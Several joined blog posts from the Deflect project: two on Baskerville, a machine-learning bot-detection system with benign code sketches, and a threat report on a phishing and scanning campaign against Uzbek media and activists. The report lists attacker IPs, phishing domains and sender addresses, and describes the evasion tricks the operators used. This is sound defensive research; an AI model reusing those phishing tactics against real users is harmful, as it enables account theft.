Baskerville is a machine operating on the Deflect network that protects sites from hounding, malicious bots. It's also an open-source project that, in time, will be able to reduce bad bot behaviour on your networks too. Baskerville responds to web traffic, analyzing requests in real time and challenging those acting suspiciously. A few months ago, Baskerville passed an important milestone: making its own decisions on traffic deemed anomalous. The quality of these decisions (measured by recall) is high, and Baskerville has already successfully mitigated many sophisticated real-life attacks.
We’ve trained Baskerville to recognize what legitimate traffic on our network looks like, and how to distinguish it from malicious requests attempting to disrupt our clients’ websites. Baskerville has turned out to be very handy for mitigating DDoS attacks, and for correctly classifying other types of malicious behaviour.
Baskerville is an important contribution to the world of online security – where solid web defences are usually the domain of proprietary software companies or complicated manual rule-sets. The ever-changing nature and patterns of attacks makes their mitigation a continuous process of adaptation. This is why we’ve trained a machine how to recognize and respond to anomalous traffic. Our plans for Baskerville’s future will enable plug-and-play installation in most web environments and privacy-respecting exchange of threat intelligence data between your server and the Baskerville clearinghouse.
Chapter 2 – Background
Web attacks are a threat to democratic voices on the Internet. Botnets deploy an arsenal of methods, including brute force password login, vulnerability scanning, and DDoS attacks, to overwhelm a platform's hosting resources and defences, or to inflict financial damage on the website's owners. Attacks become a form of punishment, intimidation, and most importantly, censorship, whether through direct denial of access to an Internet resource or by instilling fear among the publishers. Much of the development to date in anomaly detection and mitigation of malicious network traffic has been closed source and proprietary. These siloed approaches are limiting when dealing with constantly changing variables. They are also quite expensive to set up, with a company's costs often offset by the sale or trade of threat intelligence gathered on the client's network, something Deflect does not do or encourage.
Since 2010, the Deflect project has protected hundreds of civil society and independent media websites from web attacks, processing over a billion monthly website requests from humans and bots. We are now bringing internally developed mitigation tooling to a wider audience, improving network defences for freedom of expression and association on the internet.
Baskerville was developed over three years by eQualitie's dedicated team of machine learning experts. The team set itself several challenges. To be an effective answer to the ever-growing need for humans to perform constant network monitoring, and to the never-ending need to write rules banning newly discovered malicious network behaviour, Baskerville had to:
Be fast enough to make it count
Be able to adapt to changing traffic patterns
Provide actionable intelligence (a prediction and a score for every IP)
Provide reliable predictions (probation period & feedback)
Baskerville works by analyzing HTTP traffic bound for your website, monitoring the proportion of legitimate versus anomalous traffic. On the Deflect network, it triggers a Turing challenge for IP addresses behaving suspiciously, thereby confirming whether a real person or a bot is sending the requests.
Chapter 3 – Baskerville Learns
To detect new and evolving threats, Baskerville uses the unsupervised anomaly detection algorithm Isolation Forest. The majority of anomaly detection algorithms construct a profile of normal instances, then classify instances that do not conform to the normal profile as anomalies. The main problem with this approach is that the model is optimized to detect normal instances, not anomalies, causing either too many false alarms or too few detected anomalies. In contrast, Isolation Forest explicitly isolates anomalies rather than profiling normal instances. This method is based on a simple assumption: 'Anomalies are few, and they are different'. In addition, the Isolation Forest algorithm does not require the training set to contain only normal instances; in fact, it performs even better if the training set contains some anomalies, or attack incidents in our case. This enables us to re-train the model regularly on all the recent traffic, without any labeling procedure, in order to adapt to changing traffic patterns.
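As a minimal illustration of this approach, here is how an Isolation Forest can be trained on unlabelled traffic data with scikit-learn. This is a hedged sketch, not Baskerville's actual pipeline: the feature matrix and parameter values are stand-ins.

```python
# Minimal Isolation Forest sketch; the 17-column feature matrix is a stand-in
# for real request-set features, not Baskerville's actual schema.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)
X_train = rng.random((10_000, 17))   # e.g. two weeks of traffic, unlabelled

model = IsolationForest(
    n_estimators=100,      # number of trees in the forest
    contamination=0.01,    # assumed fraction of anomalies in the training set
    random_state=42,
).fit(X_train)             # unsupervised: no labels required

X_new = rng.random((5, 17))
print(model.predict(X_new))        # -1 = anomalous, +1 = normal
print(model.score_samples(X_new))  # lower score = more anomalous
```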
Labelling
Although we don't need labels to train a model, we still need a labelled dataset of historical attacks for parameter tuning. Traditionally, labelling is a challenging procedure, since it requires a lot of manual work: every new attack must be reported and investigated, and every IP must be labelled either malicious or benign.
Our production environment reports several incidents a week, so we designed an automated labelling procedure that uses a machine learning model trained on the same features we use for the Isolation Forest anomaly detection model.
We reasoned that if an attack incident has a clearly visible traffic spike, we can assume that the vast majority of the IPs active during this period are malicious, and we can train a classifier like Random Forest specifically for this incident. The only user input would be the precise time period of the incident and a time period of ordinary traffic for that host. Such a classifier would not be perfect, but it would be good enough to separate some regular IPs from the majority of malicious IPs during the time of the incident. In addition, we assume that attacker IPs are most likely not active immediately before the attack, so we do not label an IP as malicious if it was seen in the regular traffic period.
This labelling procedure is not perfect, but it allows us to label new incidents with very little time or human interaction.
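A rough sketch of that per-incident labelling idea, assuming feature matrices and IP lists have already been extracted for the incident window and a regular-traffic window (all names here are hypothetical):

```python
# Per-incident labelling sketch: traffic during the spike is assumed mostly
# malicious, traffic during the regular window mostly benign.
import numpy as np
from sklearn.ensemble import RandomForestClassifier

def label_incident(X_incident, X_regular, ips_incident, ips_regular):
    X = np.vstack([X_incident, X_regular])
    y = np.concatenate([np.ones(len(X_incident)),    # 1 = assumed malicious
                        np.zeros(len(X_regular))])   # 0 = assumed benign
    clf = RandomForestClassifier(n_estimators=200, random_state=0).fit(X, y)

    labels = clf.predict(X_incident)
    # Per the assumption above: IPs already seen in the regular traffic
    # period just before the attack are never labelled malicious.
    labels[np.isin(ips_incident, ips_regular)] = 0
    return labels
```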
Performance Metrics
We use the Precision-Recall AUC metric for model performance evaluation. The main reason for using the Precision-Recall metric is that it is more sensitive to the improvements for the positive class than the ROC (receiver operating characteristic) curve. We are less concerned about the false positive rate since, in the event that we falsely predict that an IP is doing something malicious, we won’t ban it, but only notify the rule-based attack mitigation system to challenge that specific IP. The IP will only be banned if the challenge fails.
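In scikit-learn terms, the metric is average precision over a labelled test set; the labels and scores below are illustrative (note that with Isolation Forest you would negate score_samples, since lower there means more anomalous):

```python
# PR AUC (average precision) sketch with toy labels and scores.
from sklearn.metrics import average_precision_score

y_true = [0, 0, 1, 1, 0, 1]                 # 1 = IP confirmed malicious
y_score = [0.1, 0.3, 0.8, 0.65, 0.2, 0.9]   # higher = more likely malicious

print(average_precision_score(y_true, y_score))
```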
Categorical Features
After two months of validating our approach in the production environment, we started to realize that the model was not sophisticated enough to distinguish anomalies specific only to particular clients.
The main reason for this is that the originally published Isolation Forest algorithm supports only numerical features and cannot work with so-called categorical string values, such as the hostname. At first, we decided to train a separate model per target host and create an ensemble of models for the final prediction. This approach overcomplicated the whole process and did not scale well. Additionally, we had to take care of adjusting the weights in the model ensemble, and in fact we jeopardized the original idea of knowledge sharing through a single model for all clients. We then tried the classical way of dealing with this problem: one-hot encoding. However, the deployed solution did not work well, since the model overfit the new hostname feature and performance decreased.
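For reference, the one-hot attempt looked roughly like this (a pandas sketch, not our Spark code): every hostname becomes its own binary column, which is exactly what the model ended up overfitting.

```python
# One-hot encoding sketch: each hostname becomes a separate 0/1 column.
import pandas as pd

df = pd.DataFrame({
    "request_rate": [1.2, 0.4, 9.8],
    "hostname": ["site-a.org", "site-b.org", "site-a.org"],
})
print(pd.get_dummies(df, columns=["hostname"]).columns.tolist())
# ['request_rate', 'hostname_site-a.org', 'hostname_site-b.org']
```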
In the next iteration, we found another way of encoding categorical features, based on a peer-reviewed paper published in 2018. The main idea is not to use one-hot encoding, but rather to modify the tree-building algorithm itself. We could not find an implementation of the idea, so we modified the source code of the IForest library in Scala ourselves. We introduced a new string feature, 'hostname', and this time the model showed a notable performance improvement in production. Moreover, our final implementation is generic and allows us to experiment with other categorical features like country, user agent, operating system, etc.
Stratified Sampling
Baskerville uses a single machine learning model trained on the data received from hundreds of clients. This allows us to share knowledge and benefit from a model trained on a global dataset of recorded incidents. However, when we first deployed Baskerville, we realized that the model was biased towards high-traffic clients.
We had to find a balance in the amount of data we feed to the training pipeline from each client. On the one hand, we wanted to equalize the number of records from each client, but on the other hand, high traffic clients provided much more valuable incident information. We decided to use stratified sampling of training datasets with a single parameter: the maximum number of samples per host.
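A sketch of that sampling step, assuming the training data lives in a pandas DataFrame with a host column (the real pipeline runs on Spark, so this is only illustrative):

```python
# Cap the number of training samples contributed by each client (host).
import pandas as pd

def sample_per_host(df: pd.DataFrame, max_samples_per_host: int) -> pd.DataFrame:
    return df.groupby("host", group_keys=False).apply(
        lambda g: g.sample(n=min(len(g), max_samples_per_host), random_state=0)
    )

# e.g. cap every client at 50,000 request sets before training:
# train_df = sample_per_host(all_traffic, max_samples_per_host=50_000)
```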
Storage
Baskerville uses Postgres to store the processed results. The request-sets table holds the results of the real-time weblogs pre-processed by our analytics engine, which has an estimated input of ~30GB per week. So, within a year, we'd have a ~1.5TB table. Even though this is within Postgres limits, running queries on it would not be very efficient. That's where the data partitioning feature of Postgres came in: we used it to split the request-sets table into smaller tables, each holding one week's data. This allowed for better data management and faster query execution.
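Roughly, the weekly partitioning looks like this (table and column names are illustrative, not Baskerville's actual schema):

```python
# Illustrative weekly range-partitioning DDL, executed via psycopg2.
import psycopg2

DDL = """
CREATE TABLE request_sets (
    id BIGSERIAL,
    target TEXT,
    ip TEXT,
    features JSONB,
    created_at TIMESTAMPTZ NOT NULL
) PARTITION BY RANGE (created_at);

-- one child table per week of data
CREATE TABLE request_sets_2019_w01 PARTITION OF request_sets
    FOR VALUES FROM ('2019-01-01') TO ('2019-01-08');
"""

with psycopg2.connect("dbname=baskerville") as conn, conn.cursor() as cur:
    cur.execute(DDL)
```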
However, even with data partitioning, we needed to be able to scale the database out. Since we already had the Timescale extension for the Prometheus database, we decided to use it for Baskerville too. We followed Timescale's tutorial for data migration within the same database: we created a temp table, moved the data from each partition into it, ran the command to create a hypertable on the temp table, deleted the initial request-sets table and its partitions, and finally renamed the temp table to 'request_sets'. The process was not very straightforward, unfortunately, and we did run into some problems, but in the end we were able to scale the database, and we are currently running Timescale in production.
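The migration steps, roughly, under the same assumed schema as above (Timescale's create_hypertable does the heavy lifting; it must run while the temp table is still empty):

```python
# Rough sketch of the partitioned-table-to-hypertable migration described above.
MIGRATION = """
CREATE TABLE request_sets_tmp (LIKE request_sets INCLUDING DEFAULTS);
-- turn the empty temp table into a hypertable chunked by week
SELECT create_hypertable('request_sets_tmp', 'created_at',
                         chunk_time_interval => INTERVAL '1 week');
INSERT INTO request_sets_tmp SELECT * FROM request_sets;
DROP TABLE request_sets;  -- removes the old table and all its partitions
ALTER TABLE request_sets_tmp RENAME TO request_sets;
"""
```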
We also explored other options, like TileDb, Apache Hive, and Apache HBase, but for the time being, Timescale is enough for our needs. We will surely revisit this in the future, though.
Architecture
The initial design of Baskerville assumed that it would run within Deflect as an analytics engine, aiding the existing rule-based attack detection and mitigation mechanism. However, the needs changed, and it became necessary to open up Baskerville's predictions to other users and make our insights available to them.
In order to allow other users to take advantage of our model, we had to redesign the pipelines to be more modular. We also needed to take into account the kind of data to be exchanged; more specifically, we wanted to avoid any exchange involving sensitive data, like IPs. The idea is that the preprocessing happens on the client's end, and only the resulting feature vectors are sent, via Kafka, to the Prediction centre. The Prediction centre continuously listens for incoming feature vectors, and once a request arrives, it uses the pre-trained model to make a prediction and sends the result back to the user. This whole process happens without the exchange of any kind of sensitive information, as only the feature vectors go back and forth.
On the client side, we had to implement a caching mechanism with a TTL, so that request sets wait for their matching predictions. If the Prediction centre takes more than 10 minutes, the request sets expire. Ten minutes is of course not an acceptable response time, just a safeguard so that we do not keep request sets forever, which could result in an out-of-memory error. The TTL is configurable. We used Redis for this mechanism, as it has the TTL feature built in and there is a spark-redis connector we could easily use, though we are still tuning the performance and considering alternatives. We also needed a separate Spark application to match predictions to request sets once the response from the Prediction centre is received. This application listens to the client-specific Kafka topic, and once a prediction arrives, it looks into Redis, fetches the matching request set, and saves everything to the database.
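A minimal sketch of that cache, assuming request sets are serialized to JSON and keyed by an ID that the prediction message echoes back (key names are assumptions):

```python
# Client-side cache: request sets wait in Redis for their predictions and
# expire after a configurable TTL.
import json
import redis

r = redis.Redis(host="localhost", port=6379)
TTL_SECONDS = 600  # the 10-minute safeguard mentioned above; configurable

def cache_request_set(request_set_id: str, request_set: dict) -> None:
    r.setex(f"request_set:{request_set_id}", TTL_SECONDS, json.dumps(request_set))

def match_prediction(request_set_id: str, prediction: dict):
    raw = r.get(f"request_set:{request_set_id}")
    if raw is None:
        return None  # expired: the prediction arrived too late
    request_set = json.loads(raw)
    request_set["prediction"] = prediction
    return request_set  # ready to be saved to the database
```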
To sum up, in the new architecture the preprocessing happens on the client's side, the feature vectors are sent via Kafka to the Prediction centre (no sensitive data is exchanged), a prediction and a score for each request set are sent as a reply to each feature vector (via Kafka), and on the client side another Spark job consumes the prediction message, matches it with the respective request set, and saves it to the database.
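A minimal sketch of that exchange using kafka-python; the topic names, broker address and message fields are assumptions, not the actual Baskerville protocol:

```python
# Client side of the feature-vector exchange: send features, await predictions.
import json
from kafka import KafkaProducer, KafkaConsumer

producer = KafkaProducer(
    bootstrap_servers="prediction-centre:9092",
    value_serializer=lambda v: json.dumps(v).encode(),
)
# Only the feature vector leaves the client; no raw logs, no IPs.
producer.send("features", {"request_set_id": "abc123",
                           "features": [0.1, 3.2, 0.7]})
producer.flush()

consumer = KafkaConsumer(
    "predictions.client-42",  # client-specific reply topic
    bootstrap_servers="prediction-centre:9092",
    value_deserializer=lambda v: json.loads(v.decode()),
)
for msg in consumer:
    print(msg.value)  # e.g. {"request_set_id": "abc123", "prediction": -1, "score": -0.12}
```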
Read more about the project and download the source to try for yourself. Contact us for more information or to get help setting up Baskerville in your web environment.
The attacks leading to the publication of this report quickly stood out from the daily onslaught of malicious traffic on Deflect, at first because they were using professional vulnerability scanning tools like Acunetix. The moment we discovered that the origin server of these scans was also hosting fake Gmail domains, it became evident that something bigger was going on. In this report, we describe all the pieces we have put together about this campaign, in the hope of contributing to public knowledge about the methods and impact of such attacks against civil society.
Context: Human Rights and Surveillance in Uzbekistan
Uzbekistan is described by many human rights organizations as an authoritarian state with strong repression of civil society. Since the collapse of the Soviet Union, two presidents have presided over a system that institutionalized torture and repressed freedom of expression, as documented over the years by Human Rights Watch, Amnesty International and Front Line Defenders, among many others. Repression extended to media and human rights activists in particular, many of whom had to leave the country and continue their work in diaspora.
Uzbekistan was one of the first countries to establish a pervasive Internet censorship infrastructure, blocking access to media and human rights websites. Hacking Team servers in Uzbekistan were identified as early as 2014 by the Citizen Lab, and leaked Hacking Team emails later confirmed that the Uzbek National Security Service (SNB) was among the customers of Hacking Team solutions. A Privacy International report from 2015 describes the installation in Uzbekistan of several monitoring centres with mass surveillance capabilities, provided by the Israeli branch of the US-based company Verint Systems and by the Israel-based company NICE Systems. A 2017 Amnesty International report entitled 'We will find you, anywhere' gives more context on the use of these capabilities, describing digital surveillance and targeted attacks against Uzbek journalists and human rights activists. Among other cases, it describes the unfortunate events behind the closure of uznews.net, an independent media website established by Galima Bukharbaeva in 2005 following the Andijan massacre. In 2014, she discovered that her email account had been hacked and that information about the organization, including names and personal details of journalists in Uzbekistan, had been published online. Galima is now the editor of Centre1, a Deflect client and one of the targets of this investigation.
A New Phishing and Web Attack Campaign
On the 16th of November 2018, we identified a large attack against several websites protected by Deflect. This attack used several professional security audit tools like NetSparker and WPScan to scan the websites eltuz.com and centre1.com.
Peak of traffic during the attack (16th of November 2018)
This attack came from the IP address 51.15.94.245 (AS12876 – Online SAS, an IP range dedicated to Scaleway servers). By looking at older traffic from this same IP address, we found several attacks on other Deflect protected websites, but we also found domains mimicking Google and Gmail hosted on this IP address, like auth.login.google.email-service[.]host or auth.login.googlemail.com.mail-auth[.]top. We looked into passive DNS databases (using the PassiveTotal Community Edition and other tools like RobTex) and cross-referenced that information with attacks seen on Deflect protected websites with logging enabled. We uncovered a large campaign combining web and phishing attacks against media and activists. We found the first evidence of activity from this group in February 2016, and the first evidence of attacks in December 2017.
The list of Deflect protected websites targeted by this campaign may give some context to the motivation behind it. Four websites were targeted:
Eltuz is an independent Uzbek-language news website
Fergana News is a leading independent Russian & Uzbek language news website covering Central Asian countries
Centre1 is an independent media organization covering news in Central Asia
Palestine Chronicle is a non-profit organization working on human-rights issues in Palestine
Three of these targets are prominent media focusing on Uzbekistan. We have been in contact with their editors and several other Uzbek activists to find out if they had received phishing emails as part of this campaign. Some of them were able to confirm receiving such messages and forwarded them to us. Reaching out further afield, we were able to get confirmations of phishing attacks from other prominent Uzbek activists who were not linked to websites protected by Deflect.
Palestine Chronicle seems to be an outlier in this group of media websites focusing on Uzbekistan. We don’t have a clear hypothesis about why this website was targeted.
A year of web attacks against civil society
Through passive DNS, we identified three IPs used by the attackers in this operation:
46.45.137.74 was used in 2016 and 2017 (timeline is not clear, Istanbul DC, AS197328)
139.60.163.29 was used between October 2017 and August 2018 (HostKey, AS395839)
51.15.94.245 was used between September 2018 and February 2019 (Scaleway, AS12876)
We have identified 15 attacks from the IPs 139.60.163.29 and 51.15.94.245 since December 2017 on Deflect protected websites:
| Date | IP | Target | Tools used |
| --- | --- | --- | --- |
| 2017/12/17 | 139.60.163.29 | eltuz.com | WPScan |
| 2018/04/12 | 139.60.163.29 | eltuz.com | Acunetix |
| 2018/09/15 | 51.15.94.245 | www.palestinechronicle.com, eltuz.com, www.fergana.info and uzbek.fergananews.com | Acunetix and WebCruiser |
| 2018/09/16 | 51.15.94.245 | www.fergana.info | Acunetix |
| 2018/09/17 | 51.15.94.245 | www.fergana.info | Acunetix |
| 2018/09/18 | 51.15.94.245 | www.fergana.info | NetSparker and Acunetix |
| 2018/09/19 | 51.15.94.245 | eltuz.com | NetSparker |
| 2018/09/20 | 51.15.94.245 | www.fergana.info | Acunetix |
| 2018/09/21 | 51.15.94.245 | www.fergana.info | Acunetix |
| 2018/10/08 | 51.15.94.245 | eltuz.com, www.fergananews.com and news.fergananews.com | Unknown |
| 2018/11/16 | 51.15.94.245 | eltuz.com, centre1.com and en.eltuz.com | NetSparker and WPScan |
| 2019/01/18 | 51.15.94.245 | eltuz.com | WPScan |
| 2019/01/19 | 51.15.94.245 | fergana.info, www.fergana.info and fergana.agency | Unknown |
| 2019/01/30 | 51.15.94.245 | eltuz.com and en.eltuz.com | Unknown |
| 2019/02/05 | 51.15.94.245 | fergana.info | Acunetix |
Besides classic open-source tools like WPScan, these attacks show the use of a wide range of commercial security audit tools, like NetSparker or Acunetix. Acunetix offers a trial version that may have been used here; NetSparker does not, suggesting that the operators may have a sizeable budget (the standard offer is $4,995/year, though a cracked version may have been used).
It is also surprising to see so many different tools operated from a single server, as many of them require a graphical user interface. When we scanned the IP 51.15.94.245, we discovered that it hosted a Squid proxy on port 3128; we think this proxy was used to relay traffic from the operator's own computer.
Extract of an nmap scan of 51.15.94.245 in December 2018:
3128/tcp open http-proxy Squid http proxy 3.5.23
|_http-server-header: squid/3.5.23
|_http-title: ERROR: The requested URL could not be retrieved
A large phishing campaign
After discovering a long list of domains made to resemble popular email providers, we suspected that the operators were also running a phishing campaign. We contacted the owners of the targeted websites, along with several Uzbek human rights activists, and gathered 14 different phishing emails targeting two activists between March 2018 and February 2019:
| Date | Sender | Subject | Link |
| --- | --- | --- | --- |
| 12th of March 2018 | g.corp.sender[@]gmail.com | У Вас 2 недоставленное сообщение (You have 2 undelivered messages) | http://mail.gmal.con.my-id[.]top/ |
| 13th of June 2018 | service.deamon2018[@]gmail.com | Прекращение предоставления доступа к сервису (Termination of access to the service) | http://e.mail.gmall.con.my-id[.]top/ |
| 18th of June 2018 | id.warning.users[@]gmail.com | Ваш новый адрес в Gmail: alexis.usa@gmail.com (Your new email address in Gmail: alexis.usa@gmail.com) | http://e.mail.users.emall.com[.]my-id.top/ |
| 10th of July 2018 | id.warning.daemons[@]gmail.com | Прекращение предоставления доступа к сервису (Termination of access to the service) | hxxp://gmallls.con-537d7.my-id[.]top/ |
| 10th of July 2018 | id.warning.daemons[@]gmail.com | Прекращение предоставления доступа к сервису (Termination of access to the service) | |
Almost all of these emails mimicked Gmail alerts to entice the user to click on the link. For instance, this email received on the 23rd of October 2018 pretends that the account will soon be closed, using images of the text hosted on imgur to bypass Gmail's detection:
The only exception was an email received on the 16th of October 2018 pretending to offer confidential information on the former Hokim (governor) of Tashkent:
The emails used simple tricks to bypass detection, at times relying on the drw.sh URL shortener (a tool belonging to the Russian security company Doctor Web) or on open redirects offered by several Google tools.
Every email we have seen used a different sub-domain, including emails sent from the same Gmail account with the same subject line. For instance, two different emails entitled “Прекращение предоставления доступа к сервису” and sent from the same address used hxxp://gmallls.con-537d7.my-id[.]top/ and http://gmallls.con-4f137.my-id[.]top/ as phishing domains. We think that the operators used a different sub-domain for every email sent in order to bypass Gmail's list of known malicious domains, which would explain the large number of sub-domains identified through passive DNS. We have identified 74 sub-domains for 26 second-level domains used in this campaign (see the appendix below for the full list of discovered domains).
We think that each phishing page stayed online only for a short time after the corresponding email was sent, in order to avoid detection. We got access to the phishing pages of a few emails, and could confirm that the phishing toolkit checked whether the entered password was correct (against the actual Gmail account). We suspect that it also handled two-factor authentication codes (text messages and 2FA applications), but could not confirm this.
Timeline for the campaign
We found the first evidence of activity in this operation with the registration of the domain auth-login[.]com on the 21st of February 2016. Because we discovered the campaign only recently, we have little information on attacks during 2016 and 2017, but domain registration dates show some activity in July and December 2016, and then again in August and October 2017. It is very likely that the campaign started in 2016 and continued through 2017 without any public reporting about it.
Here is a first timeline we obtained based on domain registration dates and the dates of web attacks and phishing emails:
To confirm that this group had some activity during 2016 and 2017, we gathered encryption (TLS) certificates for these domains and sub-domains from the crt.sh Certificate Transparency database. We identified 230 certificates generated for these domains, most of them created by Cloudflare. Here is a new timeline integrating the creation of TLS certificates:
We see here many certificates created since December 2016 and continuing over 2017, which shows that this group had some activity during that time. The large number of certificates over 2017 and 2018 comes from campaign operators using Cloudflare for several domains. Cloudflare creates several short-lived certificates at the same time when protecting a website.
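For anyone wanting to reproduce this step: crt.sh exposes a JSON endpoint that can be queried per domain (the domain below is a placeholder, not one of the campaign domains):

```python
# Fetch certificate-transparency entries for a domain from crt.sh.
import requests

resp = requests.get("https://crt.sh/",
                    params={"q": "%.example.com", "output": "json"})
for cert in resp.json():
    print(cert["not_before"], cert["name_value"])  # issue date, covered names
```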
It is also interesting to note that the campaign started in February 2016, with some activity in the summer of 2016, which happens to be when the former Uzbek president Islam Karimov died, news first reported by Fergana News, one of the targets of this attack campaign.
Infrastructure Analysis
We identified the domains and subdomains of this campaign through analysis of passive DNS information, mostly using the Community access of PassiveTotal. Many domains registered in 2016 and 2017 reused the same registrant email address, b.adan1@walla.co.il, which helped us identify other domains related to this campaign:
Based on this list, we identified the subdomains and IP addresses associated with them, and discovered three IP addresses used in the operation. We used Shodan historical data and the dates of passive DNS records to estimate the timeline of utilisation of the different servers:
46.45.137.74 was used in 2016 and 2017
139.60.163.29 was used between October 2017 and August 2018
51.15.94.245 was used between September 2018 and February 2019
We have identified 74 sub-domains for 26 second-level domains used in this campaign (see the appendix for a full list of IOCs). Most of these domains mimic Gmail, but there are also domains mimicking Yandex (auth.yandex.ru.my-id[.]top), mail.ru (mail.ru.my-id[.]top), qip.ru (account.qip.ru.mail-help-support[.]info), Yahoo (auth.yahoo.com.mail-help-support[.]info), Live (login.live.com.mail-help-support[.]info) or rambler.ru (mail.rambler.ru.mail-help-support[.]info). Most of these domains are sub-domains of a few generic second-level domains (like auth-mail.com), but a few specific second-level domains are interesting:
We have not found any information on vzlom[.]top or fixerman[.]top. Vzlom means “break-in” in Russian, so it could have hosted or mimicked a security website.
A weird Cyber-criminality Nexus
It is quite unusual to see connections between targeted attacks and cyber-criminal enterprises; however, during this investigation we encountered two such links.
The first is the domain msoffice365[.]win, registered by b.adan1@walla.co.il (like many other domains from this campaign) on the 7th of December 2016. This domain was identified as a C2 server for a cryptocurrency theft tool called Quant, as described in a Forcepoint report released in December 2017. VirusTotal confirms that this domain hosted several samples of this malware in November 2017 (it was registered for a year). We have not seen any malicious activity from this domain related to our campaign but, as explained earlier, we have only marginal visibility into the group's activity in 2017.
The second link we found is between the domain auth-login[.]com and the groups behind the Bedep trojan and the Angler exploit kit. auth-login[.]com was linked to this operation through the subdomain login.yandex.ru.auth-login[.]com, which fits this campaign's pattern of long subdomains mimicking Yandex and was hosted on the same IP address, 46.45.137.74, in March and April 2016 according to RiskIQ. The domain was registered in February 2016 by yingw90@yahoo.com (David Bowers from Grovetown, GA in the US, according to whois information). This email address was also used to register hundreds of domains used in a Bedep campaign, as described by Talos in February 2016 (and confirmed by several other reports). The Angler exploit kit is one of the most notorious exploit kits, commonly used by cyber-criminals between 2013 and 2016. Bedep is a generic backdoor that was identified in 2015 and used almost exclusively with the Angler exploit kit. It should be noted that Trustwave documented the use of Bedep in 2015 to inflate the number of views of pro-Russian propaganda videos.
Even though we have not seen either of these two domains used in this campaign, the links seem too strong to be considered circumstantial. They could indicate a collaboration between cyber-criminal groups and state-sponsored groups or services. It is interesting to recall the potential involvement of Russian hacking groups in the 2014 attack on the Uznews.net editor, as described by Amnesty International.
Taking Down Servers is Hard
When the attack was discovered, we decided to investigate without sending any abuse requests until a clearer picture of the campaign emerged. In January, judging that we knew enough about the campaign, we started to send abuse requests: for the fake Gmail addresses to Google, and for the URL shorteners to Doctor Web. We did not receive any answer, but noticed that the Doctor Web URLs were taken down a few days later.
Regarding the Scaleway server, we entered an unexpected loop in their abuse process. Scaleway operates by sending the abuse request directly to the customer and then asking them to confirm that the issue has been resolved. This process works fine in the case of a compromised server, but not when the server has been rented intentionally for malicious activities. We did not want to file a standard abuse request because it would have given away information to the operators. We contacted Scaleway directly, and it took some time to find the right person on the security team. They acknowledged the difficulty of running an efficient abuse process, and after we sent them an anonymized version of this report along with proof that phishing websites were hosted on the server, they took the server down around the 25th of January 2019.
Being an infrastructure provider, we understand the difficulty of dealing with abuse requests. For a lot of hosting providers, the number of requests is what makes a case urgent or not. We encourage hosting providers to better engage with organisations working to protect Civil Society and establish trust relationships that help quickly mitigate the effects of malicious campaigns.
Conclusion
In this report, we have documented a prolonged phishing and web attack campaign focusing on media covering Uzbekistan and on Uzbek human rights activists. It shows, once again, that digital attacks are a threat to human rights activists and independent media. Several threat actors are known to combine phishing and web attacks (like the Vietnam-related group OceanLotus), but this campaign shows a dual strategy of targeting civil society websites and their editors at the same time.
We have no evidence of government involvement in this operation, but these attacks are clearly targeted at prominent voices of Uzbek civil society. They also share strong similarities with the 2014 hack of Uznews.net, where the editor's mailbox was compromised through a phishing email that appeared to be a notice from Google warning her that the account had been involved in distributing illegal pornography.
Over the past 10 years, several organisations, such as the Citizen Lab and Amnesty International, have dedicated a lot of time and effort to documenting digital surveillance and targeted attacks against civil society. We hope that this report will contribute to these efforts, and show that today, more than ever, we need to continue supporting civil society against digital surveillance and intrusion.
Counter-Measures Against such Attacks
If you think you are targeted by similar campaigns, here is a list of recommendations to protect yourself.
Against phishing attacks, it is important to learn to recognize classic phishing emails. We give some examples in this report, and you can read other similar reports by the Citizen Lab. You can also read this nice explanation by NetAlert and practice with this Google Jigsaw quiz. The second important point is to make sure that you have configured two-factor authentication on your email and social media accounts. Two-factor authentication means using a second way to authenticate when you log in, besides your password. Common second factors include text messages, temporary password apps and hardware tokens. We recommend using either temporary password apps (like Google Authenticator or FreeOTP) or hardware keys (like YubiKeys). Hardware keys are known to be more secure and are strongly recommended if you are an at-risk activist or journalist.
Against web attacks, if you are using a CMS like WordPress or Drupal, it is very important to update both the CMS and its plugins very regularly, and to avoid using unmaintained plugins (it is very common for websites to be compromised because of outdated plugins). Civil society websites are welcome to apply to Deflect for free website protection.
Appendix
Acknowledgement
We would like to thank Front Line Defenders and Scaleway for their help. We would also like to thank ipinfo.io and RiskIQ for their tools that helped us in the investigation.
The Deflect platform is a free website security service defending civil society and human rights groups from digital attack. Currently, malicious traffic is identified on the Deflect network by Banjax, a system that uses handwritten rules to flag IPs that are behaving like attacking bots, so that they can be challenged or banned. While Banjax is successful at identifying the most common brute-force cyber attacks, the approach of using a static set of rules to protect against the constantly evolving tools available to attackers is fundamentally limited. Over the past year, the Deflect Labs team has been working to develop a machine learning module to automatically identify malicious traffic on the Deflect platform, so that our mitigation efforts can keep pace with the methods of attack as these grow in complexity and sophistication.
In this report, we look at the performance of the Deflect Labs’ new anomaly detection tool, Baskerville, in identifying a selection of the attacks seen on the Deflect platform during the last year. Baskerville is designed to consume incoming batches of web logs (either live from a Kafka stream, or from Elasticsearch storage), group them into request sets by host website and IP, extract the browsing features of each request set, and make a prediction about whether the behaviour is normal or not. At its core, Baskerville currently uses the Scikit-Learn implementation of the Isolation Forest anomaly detection algorithm to conduct this classification, though the engine is agnostic to the choice of algorithm and any trained Scikit-Learn classifier can be used in its place. This model is trained on normal web traffic data from the Deflect platform, and evaluated using a suite of offline tools incorporated in the Baskerville module. Baskerville has been designed in such a way that once the performance of the model is sufficiently strong, it can be used for real-time attack alerting and mitigation on the Deflect platform.
To showcase the current capabilities of the Baskerville module, we have replayed the attacks covered in the 2018 Deflect Labs report: Attacks Against Vietnamese Civil Society, passing the web logs from these incidents through the processing and prediction engine. This report was chosen for replay because of the variety of attacks seen across its constituent incidents. There were eight attacks in total considered in this report, detailed in the table below.
| Date | Start (approx.) | Stop (approx.) | Target |
| --- | --- | --- | --- |
| 2018/04/17 | 08:00 | 10:00 | viettan.org |
| 2018/04/17 | 08:00 | 10:00 | baotiengdan.com |
| 2018/05/04 | 00:00 | 23:59 | viettan.org |
| 2018/05/09 | 10:00 | 12:30 | viettan.org |
| 2018/05/09 | 08:00 | 12:00 | baotiengdan.com |
| 2018/06/07 | 01:00 | 05:00 | baotiengdan.com |
| 2018/06/13 | 03:00 | 08:00 | baotiengdan.com |
| 2018/06/15 | 13:00 | 23:30 | baotiengdan.com |
Table 1: Attack time periods covered in this report. The time period of each attack was determined by referencing the number of Deflect and Banjax logs recorded for each site, relative to the normal traffic volume.
How does it work?
